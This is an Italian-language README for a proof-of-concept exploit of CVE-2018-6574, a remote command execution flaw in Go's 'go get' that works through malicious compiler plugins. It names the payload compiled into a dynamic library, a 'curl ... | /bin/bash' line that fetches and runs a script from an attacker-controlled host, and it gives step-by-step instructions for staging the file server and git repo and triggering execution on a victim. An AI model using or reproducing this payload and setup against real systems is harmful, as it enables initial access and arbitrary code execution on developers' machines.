
Exploit proof-of-concept per CVE-2018-6574, che dimostra l'esecuzione remota di comandi nel comando `go get` di Go tramite plugin del compilatore malevoli durante la compilazione del codice sorgente.
Go prima di 1.8.7, Go 1.9.x prima di 1.9.4 e Go 1.10 pre-release prima di Go 1.10rc2 consentono l'esecuzione di comandi remoti tramite go get durante la compilazione del codice sorgente, sfruttando la funzionalità dei plugin di gcc o clang, poiché gli argomenti -fplugin= e -plugin= non erano stati bloccati. (da mitre)
Il comando è stato compilato nella libreria dinamica calc_darwin.so. E il comando corrente è curl newton.cycarrier:8002 | /bin/bash. È stato utilizzato come accesso iniziale di un programma. Devi ospitare un server di file sulla porta 8002 e associare l'host al tuo IP.
Per prima cosa, devi installare la versione richiesta di golang sulla vittima. Poi, ospita questo repo su un server git accessibile. Infine, usa il comando go get per scaricare questo repo, e il comando verrà eseguito automaticamente.
Prendi il mio repo come esempio. Devi usare il seguente comando:
go get github.com/frozenkp/CVE-2018-6574
Questo repo è solo a scopo di valutazione.